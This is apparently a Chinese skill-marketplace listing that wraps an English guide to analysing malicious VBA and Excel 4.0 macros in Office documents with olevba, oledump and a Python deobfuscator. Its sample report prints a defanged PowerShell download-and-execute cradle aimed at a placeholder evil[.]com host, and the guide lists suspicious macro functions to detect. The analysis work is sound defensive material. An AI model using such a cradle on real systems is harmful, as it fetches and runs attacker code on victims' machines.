网络安全 Analyzing Macro Malware In Office Documents

Model: minimax-m3 | ¥0.20/call
网络安全Claude Opus 4.7安全审计AnalyzingMacro

Analyzing Macro Malware In Office Documents:网络安全 skill: analyzing-macro-malware-in-office-docu,适用于安全分析、取证与威胁排查场景。

Calls: 1

Skill Documentation

网络安全 Analyzing Macro Malware In Office Documents

摘要

Analyzing Macro Malware In Office Documents:网络安全 skill: analyzing-macro-malware-in-office-docu,适用于安全分析、取证与威胁排查场景。

> 来源: mukul975/Anthropic-Cybersecurity-Skills (18k stars) — 网络安全专业技能集

> 原文件: skills/analyzing-macro-malware-in-office-documents/SKILL.md

> 模型推荐: claude-opus-4-7 (安全分析深度推理)

这个 skill 是干嘛的

mukul975 整理的 100+ 个网络安全专业 skill — 覆盖渗透测试 / 取证 / 威胁情报 / 合规审计 / 云安全 / 移动安全 等领域。每个 skill 对应一个具体的安全分析任务。

michael 强调"skill 要有相应的指导功能,指导用户使用",所以加了下面两节让 Agent 和用户对接。

---

🤖 Agent 使用说明

1. 用户提到"分析 X 日志 / 取证 / 检测威胁 / 渗透测试 / 安全审计"时触发对应 skill

2. skill 按操作步骤执行(取证镜像 / 解析日志 / 跑威胁情报)

3. 涉及破坏性操作前必须 ask user 确认

4. 完工后跑自检

5. 区分"防御性分析" vs "恶意代码审计"

👤 用户需要做什么?

1. 告诉 Agent 你要做什么(分析日志 / 取证 / 安全审计 / 渗透测试)

2. 按 Agent 提示提供文件/镜像/日志/哈希

3. 涉及破坏性操作时明确告诉 Agent"继续"或"取消"

4. 全程 Agent 自动化,你只需提供数据 + 回答决策点

---

原 skill 内容(mukul975/Anthropic-Cybersecurity-Skills/skills/analyzing-macro-malware-in-office-documents/SKILL.md,截断到 12k chars)

---

name: analyzing-macro-malware-in-office-documents

description: 'Analyzes malicious VBA macros embedded in Microsoft Office documents

(Word, Excel, PowerPoint) to identify download cradles, payload execution, persistence

mechanisms, and anti-analysis techniques. Uses olevba, oledump, and VBA deobfuscation

to extract the attack chain. Activates for requests involving Office macro analysis,

VBA malware investigation, maldoc analysis, or document-based threat examination.

'

domain: cybersecurity

subdomain: malware-analysis

tags:

version: 1.0.0

author: mahipal

license: Apache-2.0

atlas_techniques:

d3fend_techniques:

nist_csf:

mitre_attack:

---

Analyzing Macro Malware in Office Documents

When to Use

**Do not use** for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed.

Prerequisites

Workflow

Step 1: Initial Document Triage

Determine if the document contains macros or other active content:

# Quick triage with olevba
olevba suspect.docm

# Check for OLE streams and macros
oleid suspect.docm

# Output indicators:
# VBA Macros:        True/False
# XLM Macros:        True/False
# External Relationships: True/False (remote template)
# ObjectPool:        True/False (embedded objects)
# Flash:             True/False (SWF objects)

# Comprehensive OLE analysis
oledump.py suspect.docm

# List all OLE streams with macro indicators
# Streams marked with 'M' contain VBA macros
# Streams marked with 'm' contain macro attributes

Step 2: Extract and Analyze VBA Code

Pull out the complete VBA macro source:

# Extract VBA with full deobfuscation
olevba --decode --deobf suspect.docm

# Extract just the VBA source code
olevba --code suspect.docm > extracted_vba.txt

# Detailed extraction with oledump
oledump.py -s 8 -v suspect.docm  # Stream 8 (adjust based on stream listing)

# Extract all macro streams
oledump.py -p plugin_vba_dco suspect.docm
Key VBA Elements to Identify:
━━━━━━━━━━━━━━━━━━━━━━━━━━━
Auto-Execution Triggers:
  - Auto_Open / AutoOpen (Word)
  - Auto_Close / AutoClose
  - Document_Open / Document_Close
  - Workbook_Open (Excel)
  - AutoExec

Suspicious Functions:
  - Shell() / Shell.Application
  - WScript.Shell.Run / Exec
  - CreateObject("WScript.Shell")
  - PowerShell execution
  - URLDownloadToFile
  - MSXML2.XMLHTTP (HTTP requests)
  - ADODB.Stream (file writing)
  - Environ() (environment variables)
  - CallByName (indirect method calls)

Step 3: Deobfuscate VBA Code

Remove obfuscation layers to reveal the payload:

# VBA deobfuscation techniques
import re

def deobfuscate_vba(code):
    # 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht"
    def resolve_chr(match):
        try:
            return chr(int(match.group(1)))
        except:
            return match.group(0)
    code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code)

    # 2. Remove string concatenation: "htt" & "p://" -> "http://"
    code = re.sub(r'"\s*&\s*"', '', code)

    # 3. Resolve ChrW calls: ChrW(104)
    code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code)

    # 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
    def resolve_reverse(match):
        return '"' + match.group(1)[::-1] + '"'
    code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code)

    # 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review)

    # 6. Resolve Replace(): Replace("Powxershxell", "x", "")
    def resolve_replace(match):
        original = match.group(1)
        find = match.group(2)
        replace_with = match.group(3)
        return '"' + original.replace(find, replace_with) + '"'
    code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code)

    return code

with open("extracted_vba.txt") as f:
    vba_code = f.read()

deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)

Step 4: Analyze Excel 4.0 (XLM) Macros

Handle legacy Excel macros that bypass VBA detection:

# Detect XLM macros
olevba --xlm suspect.xlsm

# Deobfuscate XLM macros
xlmdeobfuscator -f suspect.xlsm

# Manual XLM analysis with oledump
oledump.py suspect.xlsm -p plugin_biff.py

# XLM (Excel 4.0) macro functions to watch for:
# EXEC()       - Execute shell command
# CALL()       - Call DLL function
# REGISTER()   - Register DLL function
# URLDownloadToFileA - Download file
# ALERT()      - Display message (social engineering)
# HALT()       - Stop execution
# GOTO()       - Control flow
# IF()         - Conditional execution

Step 5: Check for Non-Macro Attack Vectors

Examine the document for DDE, remote templates, and embedded objects:

# Check for DDE (Dynamic Data Exchange)
python3 -c "
import zipfile
import xml.etree.ElementTree as ET
import re

z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if name.endswith('.xml') or name.endswith('.rels'):
        content = z.read(name).decode('utf-8', errors='ignore')
        # DDE field codes
        if 'DDEAUTO' in content or 'DDE ' in content:
            print(f'[!] DDE found in {name}')
            dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
            for m in dde_match:
                print(f'    Command: {m}')
        # Remote template
        if 'attachedTemplate' in content or 'Target=' in content:
            urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
            for url in urls:
                print(f'[!] Remote template URL: {url}')
"

# Check for embedded OLE objects
oledump.py -p plugin_msg.py suspect.docm

# Check relationships for external references
python3 -c "
import zipfile
z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if '.rels' in name:
        content = z.read(name).decode('utf-8', errors='ignore')
        if 'http' in content.lower() or 'ftp' in content.lower():
            print(f'External reference in {name}:')
            import re
            urls = re.findall(r'Target=\"([^\"]+)\"', content)
            for url in urls:
                print(f'  {url}')
"

Step 6: Generate Analysis Report

Document the complete macro malware analysis:

Report should include:
- Document metadata (author, creation date, modification date)
- Macro presence and type (VBA, XLM, DDE, remote template)
- Auto-execution trigger identified
- Deobfuscated VBA source code (key functions)
- Download URL(s) for second-stage payloads
- Execution method (Shell, WScript, PowerShell, COM object)
- Social engineering lure description
- Extracted IOCs (URLs, domains, IPs, file hashes)
- YARA rule for the specific document pattern

Key Concepts

| Term | Definition |

|------|------------|

| **VBA Macro** | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands |

| **Auto_Open** | VBA event procedure that executes automatically when a Word document is opened, the primary trigger for macro malware |

| **OLE (Object Linking and Embedding)** | Microsoft compound document format; Office documents are OLE containers with streams that can contain macros and objects |

| **DDE (Dynamic Data Exchange)** | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates |

| **Remote Template Injection** | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection |

| **XLM Macros (Excel 4.0)** | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools |

| **Protected View** | Office sandbox that prevents macro execution until the user clicks "Enable Content"; social engineering targets this barrier |

Tools & Systems

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

**Context**: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.

**Approach**:

1. Run oleid to confirm VBA macros are present and identify auto-execution triggers

2. Extract VBA code with olevba --decode --deobf for initial deobfuscation

3. Identify the auto-execution entry point (Auto_Open or Document_Open)

4. Trace the execution flow from the entry point through helper functions

5. Deobfuscate string concatenation and Chr() encoding to reveal the download URL

6. Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)

7. Extract all IOCs and create YARA rules for the specific obfuscation pattern

**Pitfalls**:

Output Format

OFFICE MACRO MALWARE ANALYSIS
================================
Document:         invoice_q3_2025.docm
SHA-256:          e3b0c44298fc1c149afbf4c8996fb924...
File Type:        Microsoft Word Document (OOXML with macros)
Author:           Administrator
Creation Date:    2025-09-10 14:23:00

MACRO ANALYSIS
Type:             VBA Macro
Trigger:          AutoOpen()
Streams:          3 VBA streams (ThisDocument, Module1, Module2)

DEOBFUSCATED EXECUTION CHAIN
1. AutoOpen() -> Calls Module1.RunPayload()
2. RunPayload() builds command string via Chr() concatenation
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')

SOCIAL ENGINEERING LURE
- Document displays fake "Protected Document" image
- Instructs user to "Enable Content" to view the document
- Content is blurred/hidden until macros execute

EXTRACTED IOCs
Download URL:     hxxp://evil[.]com/payload.ps1
C2 Domain:        evil[.]com
IP Address:       185.220.101[.]42
User-Agent:       PowerShell (default WebClient)

MITRE ATT&CK
T1566.001  Phishing: Spearphishing Attachment
T1204.002  User Execution: Maliciou

## 常见问题(FAQ)

## 使用「Analyzing Macr」这个 skill 能解决什么问题?
本 skill 专注于Analyzing Macr,网络安全 skill: analyzing-macro-malware-in-office-documents。它将相关流程标准化,帮助用户更快拿到可靠结果,减少重复手工操作。

## 什么情况下适合使用「Analyzing Macr」?
当你需要在Analyzing Macro Malware In Office Documents相关工作中获得稳定、可复用的产出时最适合——无论是单次任务还是纳入日常工作流,都能直接调用。

## 使用「Analyzing Macr」前需要准备什么?
需要明确授权范围内的目标系统或样本文件,并准备隔离的分析环境(虚拟机/沙箱)。